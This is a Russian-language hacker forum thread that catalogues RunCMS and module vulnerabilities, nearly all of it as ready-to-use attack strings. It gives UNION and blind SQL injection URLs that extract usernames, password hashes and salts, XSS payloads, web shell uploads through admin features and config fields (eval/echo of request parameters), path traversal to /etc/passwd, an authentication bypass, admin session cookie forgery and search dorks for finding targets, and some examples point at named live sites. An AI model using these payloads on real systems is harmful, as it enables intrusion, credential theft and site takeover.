![]() |
[ Обзор уязвимостей RunCMS ]
Обзор уязвимостей RunCMS Сайт производителя: www.runcms.org Актуальная версия: 1.6.1 Exploits Цель: RunCMS <= 1.2 Воздействие: Выполнение произвольных команд RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit Цель: RunCms 1.5.2 и более ранние версии Воздействие: SQL-инъекция RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit Цель: RunCMS <= 1.6 Воздействие: Выполнение произвольных команд RunCMS <= 1.6 Local File Inclusion Vulnerability Цель: RunCMS 1.6 и более ранние версии Воздействие: Выполнение произвольных команд RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit Цель: RunCMS 1.6 Воздействие: SQL-инъекция RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit Цель: RunCMS 1.6 Воздействие: SQL-инъекция RunCMS 1.6 Remote Blind SQL Injection Exploit (IDS evasion) Цель: RunCMS Newbb_plus 0.92 и более ранние версии Воздействие: SQL-инъекция RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit 1. Multiple Blind SQL Injection Attacker can inject SQL code in modules: Код:
http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTIONThis query will return link to download file: Код:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0Код:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.02. Stored XSS Vulnerability found in script modules/news/submit.php in post parameter name "subject" Example: Код:
POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.03. Linked XSS vulnerability found in modules/news/index.php, attacker can inject XSS in URL string: Example: Код:
http://[server]/[installdir]/modules/news/index.php/"><script>alert('DSecRG_XSS')</script>3. This page can be overwritten by PHP injection: Код:
runcms_1.6\modules\sections\cache\intro.phpV. 1.3a5 XSS Код:
http://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code]RUNCMS 1.5.1 SQL Injection Код:
http://site.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2 |
Нашел слепую скулю в runcms, начал проверять боян ли, оказалось что скуля была найдена до меня, но на ачате нет, поэтому выкладываю, уязвимость в параметре "bid" сценария "modules/banners/click.php"
Пример: http://www.runcms.de/modules/banners/click.php?op=click&bid=3%20and%20substring(version (),1,1)=4 |
1) RunCMS MyAnnonces SQL Injection(cid)
Код:
# AUTHOR : S@BUN2) RunCMS 1.6.1 Multiple XSS and XSRF Код HTML:
################################################################### |
RUNCMS 1.6.1
Добавка комментария ----------------------------- Неправильная обработка BB Code => Active XSS Пример: Код:
[*color]</textarea>[XSS][/*color](Admin priv) Exploit: Код:
modules/partners/admin/index.php?op=edit_partner&id=-1/**/union/**/select/**/1,2,3,4,5,concat(uname,0x3a,pass),7/**/from+runcms_users/**/limit/**/0,1(Admin priv) Exploit: Код:
modules/mylinks/admin/index.php?op=modCat&cid=-1/**/union/**/select/**/1,concat(uname,0x3a,pass),3,4/**/from+runcms_users+limit+0,1PHP код:
|
RunCMS Module section (artid) Remote SQL Injection Vulnerability
Код:
Cr@zy_King |
RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability
SQL Injection
Vulnerable: Module Photo 3.02 Exploit: Код:
adminКод:
allinurl: "modules/photo/viewcat.php?id" |
RunCMS Module nGuestBook 1.01 Active XSS
Add message => Message => [XSS] dork: inurl:/modules/nguestbook/ SQL Injection Vulnerable: Module Photo 4.00 Vuln code: PHP код:
Код:
http://site.com/modules/photo/rateimg.php?id=-999999+union+select+pass+from+runcms_users+where+uid=1 |
RunCMS Module MyArticles 0.0.4-0.5 sql-inj
Sql-inj в параметре topic_id, GET фильтруется, поэтому данные нужно посылать POST-ом Код:
http://mobilefree.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users |
RunCMS Module MyArticles 0.6 Beta-1 SQL Injection Vulnerability
SQL Injection http://localhost/modules/myarticles/topics.php?op=listarticles&topic_id=[SQL] Код:
-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users |
RunCMS Module HotNews 2.00 (tid) Remote SQL Injection Vulnerability
Vuln code: PHP код:
Код:
/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_usersКод:
http://www.segacfecgc.info/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_usersZAMUT(c) |
Способ если прокатила скуля и нет возможности сбрутить хеш!
1. Регаем акк на сайте (жертва) 2. В моем случае проведенная скуль имела вид Код:
modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,hash,4,5,uname,7,8,9,10+from+runcms_session+where+uid=3Вывело что-то в этом роде eb5cafcd8afa7edf125edfa35c55c73e425bd1d0 3. Логонимся под реганым акком, смотрим наши куки Примерно вот такой вид: Код:
a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2220001%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%и сессия = e2ef357450c7c647fa5c813808d1500273407483 4. Меняем на id админа (в моем случае id = 00003) и сессия = eb5cafcd8afa7edf125edfa35c55c73e425bd1d0 Получаем след.: Код:
a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2200003%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%3B%7DИ мы в админке. Спасибо за внимание! |
RunCMS Module Reviews 2.00 (lid) Remote SQL Injection Vulnerability
Vuln code: PHP код:
Код:
/modules/myReviews/reviewbook.php?lid=-999991+union+select+pass+from+runcms_users |
RunCMS Module Arcade 1.28 (gid) Remote SQL Injection Vulnerability
Vuln code: PHP код:
Код:
/index.php?act=play_game&gid=-999999+union+select+1,2,3,4,pass,6,7,8,9,10,11,12,13,14+from+runcms_users |
RunCMS <= 1.6.1 (msg_image) SQL Injection Exploit
Код:
#!/usr/bin/python |
в админке
Читалка (все версии). конфиг к бд Код:
http://localhost/runcms/class/debug/highlight.php?file=../../mainfile.phpТут радактируем хидер либо футер, как нам нужно, я вставлял ифр :) Код:
http://localhost/runcms/modules/system/admin.php?fct=meta-generatorКод:
/modules/system/admin.php?fct=smilies&op=SmilesEdit&id=-1+union+select+1,pass,3,4+from+runcms_users |
Заливка шелла в RunCMS
Заливка шелла в RunCMS
через Meta-Generator Уязвимый кусок кода: Код:
.......Код:
http://localhost/runc/modules/system/admin.php?fct=meta-generatorКод:
../../favicon.icoКод:
../../favicon.ico";echo `$_REQUEST[c]`;#Код:
......... используем так: Код:
http://localhost/runc/modules/system/admin.php?fct=meta-generator&c=dirТак же, как вариант, можно инклудить смайл/аватарку с добавленным в нее php-кодом (после заливки лежать она будет тут ../../images/smilies/smile.gif ) ZAMUT (c) |
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure ex
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure exploit
PHP код:
|
Как узнать версию ?
|
RunCMS Module Upload Center Delete File Vulnerability
version: latest -- 1.01 Showing list files Vulnerability Vuln Code: /folder.phpDelete File Vulnerability Vuln Code: /folder.php ZAMUT © |
Уязвимости модулей RunCMS
RunCMS Module eCal 2.4 Blind-SQL
Уязвимый продукт: Module eCal Версия: <= 2.4 Линк: http://www.runcms.ru/modules/files/showfile.php?lid=95 Дорк: "inurl:modules/ecal/" Blind-SQL Уязвимость в файле localleve.php. Уязвимый кусок кода: PHP код:
Код:
true: /modules/ecal/localleve.php?lid=1+and+1=1Код:
true: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=5 |
RunCMS Module eBlog 0.1 Blind-SQL
Уязвимый продукт: Module eBlog Версия: <= 0.1 Линк: http://www.runcms.ru/modules/files/showfile.php?lid=165 Дорк: "inurl:modules/eblog/" Blind-SQL Уязвимость в файле index.php. Уязвимый кусок кода: PHP код:
Код:
true: /modules/eblog/index.php?cat=1+and+1=1Код:
true: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=5 |
Уязвимости модулей RunCMS
XtremGuestbook
Версия: 1.2 Скачать: http://www.runcms.ru/modules/files/visit.php?lid=194 SQL-INJ Уязвимый скрипт: /modules/xtremuserguestbook/index1.php Запрос: /modules/xtremuserguestbook/index1.php?gbid=2&op=Messageedit&idmsg=-1+union+select+1,uname,pwdsalt,pass,5,6,7+from+run cms_users Параметр gbid - айди текушего юзера Уязвимый кусок кода: Не знаю, что это за стеб, видимо тут должна была быть проверка на административные права, но получилось вот так .. PHP код:
PHP код:
PHP код:
Активная XSS Уязвимо поле E-mail mymail@asdasd.ru'><script>alert()</script><' Заливка шелла через конфиг Зависимость: на папку /modules/xtremuserguestbook/cache должны стоять 777 чмоды (я к примеру забыл их поставить)) Уязвимый скрипт: /modules/xtremuserguestbook/conf.php Запрос: /modules/xtremuserguestbook/conf.php?gbid=2&op=Config Заюзаем поле _XTUG_NBMSGBYPAGE - 10;eval($_GET[a]);// и сохраняем настройки, они сохранятся в cache/2.php где 2 - наш айди Уязвимый кусок кода: Так же, как и в случае со скулей, идет не понятная проверка PHP код:
PHP код:
PHP код:
|
MyAnnonces
Версия: 1.7 Скачать: http://www.runcms.ru/modules/files/visit.php?lid=94 SQL-INJ Уязвимый скрипт: addannonces.php Запрос: /modules/MyAnnonces/addannonces.php?op=addindex&cid=-1+union+select+pass,2+from+runcms_users Вместо pass поочереди подставляем uname,pwdsalt, т.к. concat заюзать не получится - срабатывает мегахаксорная зашита) Уязвимый кусок кода: Уязвимость можно проэксплуатировать только, если есть хоть 1 категория. PHP код:
PHP код:
Уязвимый скрипт: annonces-p-f.php Зависимость: magic_quotes = off Запрос: /modules/MyAnnonces/annonces-p-f.php?op=EnvAnn&lid='+union+select+uname,pwdsalt,p ass+from+runcms_users%23 Уязивмый кусок кода: PHP код:
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=MailAnn&yname=&ymail=&fname=&fmail=blacksun@xakep.ru&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users На указанный email придет письмо вида Код:
Hello ,PHP код:
Можно обойтись и без отсылки на мыло) Запрос: /modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users Уязвимый кусок кода: PHP код:
Уязвимый скрипт: contact.php Зависимость: magic_quotes = off Запрос: /modules/MyAnnonces/contact.php?submit=1&id=-1'+union+select+'blacksun@xakep.ru',2,pass,uname,pwdsalt+from+runcms_users%23 Уязвимый кусок кода: PHP код:
|
BamaGalerie
Версия: 3.0.1 Скачать: http://www.runcms.ru/modules/files/visit.php?lid=282 Раскрытие путей /modules/bamagalerie3/makegoback.php?galerieConfig[page_type]=bama_page /modules/bamagalerie3/navig_cat_show.php /modules/bamagalerie3/include/copy_one_img.php?galerieConfig[page_type]=bama_page ^ а так же половина скриптов с той же папки (include) SQL-INJ Уязвимый скрипт: rateimg.php Запрос: /modules/bamagalerie3/rateimg.php?id=-1+union+select+pass+from+runcms_users Уязвимый кусок кода: PHP код:
MiniGal Версия: 0.51 Скачать: http://www.runcms.ru/modules/files/visit.php?lid=491 Активная XSS Добавить коментарий > уязвимо поле name: <script>alert()</script> Заливка шелла с админки модуля - Заливаем картинку, затем редактируем Description: <?eval($_GET[a]);?> Шелл будет в файле mg2db_idatabase.php |
Цитата:
Версия: 1.0 Скачать: http://www.runcms.ru/modules/files/visit.php?lid=302 SQL-INJ Уязвимый скрипт: newcomment.php Запрос: /modules/myalbum/newcomment.php?item_id=-1+union+select+pass+from+runcms_users%23 Уязвимый кусок кода: Фактически целиком весь файл PHP код:
(Скулю не добил, у меня какие то проблемы с модулем ..) Запрос: /modules/myalbum/photo.php?lid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13%23 Уязвимый кусок кода: PHP код:
Запрос: /modules/myalbum/ratephoto.php?lid=-1+union+select+pass+from+runcms_users Уязвимый кусок кода: PHP код:
Уязвимый скрипт: viewcat.php Запрос: /modules/myalbum/viewcat.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12%23 Уязвимый кусок кода: PHP код:
|
eBlog
Версия: 0.3 Заходим, создаем свой блог, добавляем запись .. Уязвимый скрипт: blogentry.php Запрос: blogentry.php?op=edit&text_id=-1+union+select+1,pass,pwdsalt,4+from+runcms_users+limit+0,1 Где выделенная еденица - айди вашего блога Уязвимый кусок кода: PHP код:
Уязвимо поле имя блога |
Event Calendar
Версия: 2.4 Уязвимый скрипт: display.php Запрос: /modules/ecal/display.php?year1=&month1=&day1=&katid=-1+union+select+pass,2+from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/ecal/localleve.php?lid=-1+union+select+pass+from+runcms_users%23 Уязвимый кусок кода: PHP код:
Запрос: /modules/ecal/location.php?lid=-1+union+select+1,2,3,uname,5,pass,pwdsalt,8,9,10,1 1+from+runcms_users Уязвимый кусок кода: PHP код:
Зависимость: magic_quotes = off Запрос: /modules/ecal/modifevent.php?id=-1'+union+select+1,2,uname,4,5,6,pass,pwdsalt,9,10, 11,12,13,14+from+runcms_users%23 Уязвимый кусок кода: PHP код:
Запрос: /modules/ecal/remind.php?op=remindadd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14 +from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/ecal/teilnehmen.php?op=teiladd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14 +from+runcms_users Уязвимый кусок кода: PHP код:
|
Friendfinder
Версия: 3.02 Уязвимый скрипт: search.php Запрос: /modules/friendfinder/search.php?page=search&search=search&agefrom=77&ag etill=19+union+select+1,uname,pwdsalt,4,0x31322e31 322e31393939,pass+from+runcms_users%23&sex=&partne r=&state=&category=&sort= Уязвимый кусок кода: PHP код:
Зависимость: magic_quotes = off Запрос: /modules/friendfinder/view.php?id=-1'+union+select+1,uname,3,4,5,pass,7,8,9,pwdsalt,1 1,12,13,14,0x31322e31322e31393939,16,17,19,20,21,2 2+from+runcms_users%23 Уязвимый кусок кода: PHP код:
|
googlestats
Версия: 2 Уязвимый скрипт: info-robot.php Запрос: /modules/googlestats/info-robot.php?robot=-1+union+select+1,2,pass,pwdsalt,5,uname,7,8,9,10+f rom+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/googlestats/index.php?rub=&robot=-1+union+select+pass+from+runcms_users%23&s=06&d=20 090202 Уязвимый кусок кода: PHP код:
|
HotNews
Версия: 2 Уязвимый скрипт: rate.php Запрос: /modules/HotNews/rate.php?tid=-1+union+select+1,pass+from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/HotNews/?op=viewexttutorial&tid=-1+union+select+pass+from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/HotNews/?op=viewtutorial&tid=-1+union+select+1,2,uname,4,pass,6,7,8,9+from+runcm s_users Уязвимый кусок кода: PHP код:
Запрос: /modules/HotNews/?op=listHotNews&cid=-1+union+select+1,pass,3+from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/HotNews/?op=printpage&tid=-1+union+select+1,2,pass,4+from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/HotNews/submit.php?op=addTutorial&cid=-1+union+select+1,uname,pass,4+from+runcms_users Уязвимый кусок кода: PHP код:
Уязвимый скрипт: upload.php Скрипт не проверяет типа файла \ расширение поэтому возможно можно залить шелл в папку images, либо в любую другую, передав соотвествующий путь в переменной img_path ( Хотя у меня на локале не заливались даже картинки, поэтому проверить не смог .. впрочем, если расширение и проверяется, то можно залить шелл с раширением .jpg, но img_path=/shell.php%00 ) |
banners - дефолтный модуль RunCMS
Версия: 1.4 SQL-INJ Уязвимый скрипт: index.php Зависимость: magic_quotes = off Зависимость: Включенный модуль banners Вначале обойдем авторизацию Запрос [POST \ GET]: login=q' union select 1,2,3,0x393030313530393833636432346662306436393633 6637643238653137663732#&pass=abc где 0x393030313530393833636432346662306436393633663764 3238653137663732 - хэш от abc, переведенный в число. Уязвимый кусок кода: PHP код:
Уязвимый кусок кода: PHP код:
-1 union select uname,0,0,0,0 from runcms_users limit 0,1 -1 union select pass,0,0,0,0 from runcms_users limit 0,1 -1 union select pwdsalt,0,0,0,0 from runcms_users limit 0,1 Переведем в число: uname: 0x2d3120756e696f6e2073656c65637420756e616d652c302c 302c302c302066726f6d2072756e636d735f7573657273206c 696d697420302c31 pass: 0x2d3120756e696f6e2073656c65637420706173732c302c30 2c302c302066726f6d2072756e636d735f7573657273206c69 6d697420302c31 pwdsalt: 0x2d3120756e696f6e2073656c6563742070776473616c742c 302c302c302c302066726f6d2072756e636d735f7573657273 206c696d697420302c31 Итого общий запрос: login=q' union select 0x2d3120756e696f6e2073656c65637420756e616d652c302c 302c302c302066726f6d2072756e636d735f7573657273206c 696d697420302c31,2,3,0x393030313530393833636432346 6623064363936336637643238653137663732#&pass=abc |
messages - дефолтный модуль RunCMS
Версия: 1.02 Blind SQL-INJ Уязвимый скрипт: read.php и readsend.php Посимвольный брут Запрос: /modules/messages/read.php?start=0&total_messages=1&sort=msg_time+an d+(select+ascii(substring(pass,1,1))+from+runcms_u sers+limit+0,1)>100&by=DESC Уязвимый кусок кода: PHP код:
|
Members List
Версия: 1.1 Уязвимый скрипт: index.php Запрос: /modules/memberslist/index.php?query=!')+union+select+1,pass+from+runcm s_users%23 Уязвимый кусок кода: PHP код:
|
Arcade
Версия: 0.51 Уязвимый скрипт: index.php Запрос: /modules/arcade/index.php?act=show_cat&cat_id=-1+union+select+1,pwdsalt,pass,4,uname,6,7,8,9,10,1 1,12,13,14,15+from+runcms_users%23 Уязвимый кусок кода: PHP код:
Уязвимый кусок кода: PHP код:
Уязвимый кусок кода: PHP код:
Зависимость: magic_quotes = off Запрос: /modules/arcade/index.php?act=download_game&game=/../../../../../../../../../../../../../../../../../../../etc/passwd%00 Уязвимый кусок кода: PHP код:
|
Book Reviews
Версия: 0.3 Уязвимый скрипт: index.php Запрос: Код:
/modules/mareviews/?func=catlist&category=%252d%2531%2527%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2563%256f%256e%2563%2561%2574%255f%2577%2573%2528%2530%2578%2533%2561%252c%2570%2561%2573%2573%252c%2570%2577%2564%2573%2561%256c%2574%2529%252c%2575%256e%2561%256d%2565%252c%2533%2520%2566%2572%256f%256d%2520%2572%2575%256e%2563%256d%2573%255f%2575%2573%2565%2572%2573%2523PHP код:
|
RunCMS 2.1
Active XSS http://yoursite/edituser.php Поле address varchar(150) Поле town varchar(60) Заливка шелла через админку http://yoursite/modules/system/admin.php?fct=tpleditor Заливаем zip архив с шеллом. Шелл будет залит сюда: http://yoursite/themes/shell.php --------------------------------------------------------- http://yoursite/modules/system/admin.php?fct=blocksadmin Добавляем новый блок: Content - сюда вставляем инклюд шелла, например: PHP код:
Заходим на страницу содержащую блок или смотрим его preview. Шелл будет залит сюда: http://yoursite/modules/system/shell.php Player#1 (c) |
Run CMS 2.1
www.runcms.org SQL-Injection file:/modules/forum/reply.php PHP код:
PHP код:
Код:
GET /modules/forum/reply.php?forum=3&post_id=-4+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18&topic_id=4&viewmode=flat&order=0need: administrator account, mq=off Код:
/modules/system/admin.php?fct=tpleditor&op=file_edit&module=../../../[local_file]%00Full Path Disclosure Код:
/footer.phpupload shell need: administrator account Логинимся.. Идём в System Admin -> Theme Editor -> архивируем шелл (*.zip) -> жмём upload шелл будет доступен по адресу http://site.ru/themes/shell.php |
Run CMS 2.1
SQL-Injection need:user account file:/modules/pm/print.php PHP код:
Код:
/modules/pm/print.php?op=print_pn&msg_id=-0+union+select+1,2,3,4,5,6-------------- Код:
/modules/forum/edit.php?forum=1&post_id=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18&topic_id=4&viewmode=flat&order=0 |
| Время: 04:14 |